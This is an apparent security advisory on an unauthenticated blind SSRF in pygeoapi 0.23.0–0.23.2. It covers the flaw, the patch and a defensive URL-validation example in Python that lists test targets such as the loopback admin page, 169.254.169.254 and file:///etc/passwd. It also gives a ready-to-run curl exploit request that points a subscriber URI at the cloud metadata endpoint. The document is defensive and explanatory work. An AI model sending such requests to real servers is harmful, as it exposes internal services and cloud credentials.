The vulnerability exists in the process manager of pygeoapi versions 0.23.0 through 0.23.2. When a user submits a job to an OGC API - Processes compliant process, the execution request may carry a `subscriber` object that contains URLs to be notified about the job's status. The functions `_send_in_progress_notification`, `_send_success_notification` and `_send_failed_notification` in the `BaseManager` class passed those user-supplied URLs straight to `requests.post` without any validation.

An unauthenticated attacker can therefore craft a process execution request whose `subscriber` object points at an internal resource, for example `http://127.0.0.1:8080/admin`. The pygeoapi server then issues that request itself, which lets the attacker scan the internal network, reach sensitive endpoints, or interact with internal services. This is a classic Server-Side Request Forgery (SSRF). Note that the notification is fire-and-forget: the response to the POST is not returned to the caller, so the SSRF is blind and must be confirmed through side effects or an out-of-band callback rather than response content.

The issue has been patched in the master branch and shipped in the 0.23.3 release. The patch introduces a validation function, `is_request_allowed`, that checks whether a URL resolves to a private or loopback IP address. By default, requests to such internal addresses are blocked unless the new configuration directive `allow_internal_requests` is explicitly set to `True`. The commit that contains the fix is 3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef.
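To make the fix concrete, here is an `is_request_allowed`-style check of the kind the paragraph above describes. This is an added example written for this article, not pygeoapi's own implementation, and the hostnames and DNS answers in `NAME_TABLE` are constructed so that it runs offline; pass `resolver=system_resolver` to use real DNS. The point it demonstrates beyond the advisory text is what such a check has to cover to be worth anything: IP literals in every spelling (IPv4, bracketed IPv6, IPv4-mapped IPv6), names that resolve to a mix of public and internal addresses, unresolvable names, and non-HTTP schemes, all failing closed.

```python
# Added example for this article: an is_request_allowed()-style check of the kind
# the pygeoapi 0.23.3 fix describes. Illustrative code, not pygeoapi's own
# implementation. The resolver is injectable so the example runs offline against a
# constructed name table; pass resolver=system_resolver to use real DNS.
import ipaddress
import socket
from typing import Callable, Iterable, List
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]


def system_resolver(host: str) -> List[str]:
    """Resolve a hostname with the OS resolver, returning every A/AAAA answer."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _looks_like_ip(host: str) -> bool:
    """True if the host component is an address literal rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _as_ip(addr: str):
    """Parse an address literal; unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1 -> 127.0.0.1)."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip


def _is_internal(ip) -> bool:
    """Anything a server should not call on a client's behalf: loopback, RFC 1918 /
    ULA, link-local (which covers 169.254.169.254), unspecified, multicast, reserved,
    and whatever else the ipaddress module does not classify as globally routable."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified
            or ip.is_multicast or ip.is_reserved or not ip.is_global)


def is_request_allowed(url: str, allow_internal_requests: bool = False,
                       resolver: Resolver = system_resolver) -> bool:
    """Decide whether a subscriber URI may be called. Fails closed on anything odd."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False                     # file://, gopher://, or no host at all
    if allow_internal_requests:
        return True                      # operator explicitly opted in
    host = parts.hostname                # urlsplit strips [] from IPv6 literals
    try:
        addrs = [host] if _looks_like_ip(host) else list(resolver(host))
        ips = [_as_ip(a) for a in addrs]
    except (ValueError, OSError):        # bad literal, NXDOMAIN, resolver failure
        return False
    if not ips:
        return False
    # Every answer must be external: a name that returns one public and one
    # internal address (a common SSRF trick) is rejected outright.
    return not any(_is_internal(ip) for ip in ips)


# Constructed name table standing in for DNS; these names and answers are
# made up for the example and do not exist.
NAME_TABLE = {
    "hooks.example": ["93.184.216.34"],
    "split.attacker.example": ["93.184.216.34", "127.0.0.1"],
    "meta.attacker.example": ["169.254.169.254"],
    "mapped.attacker.example": ["::ffff:7f00:1"],
}


def table_resolver(host: str) -> List[str]:
    """Offline resolver over NAME_TABLE; unknown names fail like NXDOMAIN."""
    if host not in NAME_TABLE:
        raise socket.gaierror(f"{host}: Name or service not known")
    return NAME_TABLE[host]


def check_examples() -> dict:
    """Run the usual SSRF targets through the check with the offline resolver."""
    urls = [
        "http://hooks.example/job-done",
        "http://127.0.0.1:8080/admin",
        "http://[::1]:8080/admin",
        "http://[::ffff:127.0.0.1]/",
        "http://169.254.169.254/latest/meta-data/",
        "http://split.attacker.example/",
        "http://mapped.attacker.example/",
        "http://nxdomain.attacker.example/",
        "file:///etc/passwd",
    ]
    return {u: is_request_allowed(u, resolver=table_resolver) for u in urls}


if __name__ == "__main__":
    for url, allowed in check_examples().items():
        print(f"{'ALLOW' if allowed else 'BLOCK'}  {url}")
```

Two caveats a reviewer would raise against any pre-flight check of this shape. First, it resolves the name once, and the later `requests.post` resolves it again, so a name that changes its answer between the two lookups (DNS rebinding) slips through; the robust form connects to the address that was validated. Second, `requests.post` follows redirects by default, so a public URL that 302s to `169.254.169.254` bypasses the check unless the caller passes `allow_redirects=False`.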
<h2 style="color: blue;">dailycve form:</h2>
Platform: pygeoapi
Version: 0.23.x
Vulnerability: Unauthenticated SSRF
Severity: High
date: 2026-04-22
<h2 style="color: blue;">Prediction: Patch already released</h2>
<h2 style="color: blue;">Analytics under heading What Undercode Say:</h2>
Identify vulnerable version
curl -s https://your-pygeoapi-server/openapi.json | jq -r '.info.version'
(pygeoapi reports its own software version in the OpenAPI document's info.version; 0.23.0, 0.23.1 and 0.23.2 are affected, 0.23.3 is fixed)
Confirm SSRF by triggering a notification request. The response to the notification is never relayed to the caller, so the SSRF is blind: point one subscriber URI at a listener you control and watch for the callback, and use internal targets such as the cloud metadata endpoint only for side-effect or timing checks. The subscriber keys follow the OGC API - Processes schema (successUri is required; inProgressUri and failedUri are optional), and hello-world needs a name input to run to completion
curl -X POST https://your-pygeoapi-server/processes/hello-world/execution \
-H "Content-Type: application/json" \
-d '{"inputs":{"name":"test"},"subscriber":{"successUri":"http://your-listener.example/done","inProgressUri":"http://169.254.169.254/latest/meta-data/"}}'
List all processes that accept subscriber objects
curl -s https://your-pygeoapi-server/processes | jq '.processes[].id'
<h2 style="color: blue;">Exploit:</h2>
Send a POST request to `/processes/{processId}/execution` (for example `/processes/hello-world/execution`) with a `subscriber` object whose `successUri`, `inProgressUri` or `failedUri` is set to an internal address. The server makes the request to that address itself, exposing internal services. Because the response is not returned to the attacker, exploitation is blind: rely on out-of-band callbacks, timing and error behaviour rather than response content.
Protection from this CVE
Upgrade to pygeoapi version 0.23.3. The `allow_internal_requests` directive only exists from 0.23.3 onward, so there is nothing to set on a vulnerable version; after upgrading, leave it unset (the default is false) so that notification URIs resolving to private or loopback addresses are blocked. If an immediate upgrade is not possible, disable process-based resources in the pygeoapi configuration file. As defence in depth, restrict outbound traffic from the pygeoapi host at the network layer so it cannot reach loopback, RFC 1918 ranges, link-local addresses or the cloud metadata endpoint (169.254.169.254).
Impact
An unauthenticated attacker can bypass network boundaries, scan internal infrastructure, access sensitive metadata endpoints (e.g., cloud instance metadata), and potentially pivot to other internal services.
Sources:
Reported By: github.com

